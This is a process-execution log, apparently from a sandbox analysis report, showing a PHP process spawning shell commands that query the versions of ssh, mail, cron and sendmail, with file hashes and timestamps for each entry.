Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "ssh --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/ssh |
Arguments: | ssh --version |
File size: | 707248 bytes |
MD5 hash: | 1364a38b48fc80f887f7071720836346 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "mail --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "cron --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/sbin/cron |
Arguments: | cron --version |
File size: | 4472 bytes |
MD5 hash: | 162d6f607a789827ab83f6393c566acf |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "sendmail --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |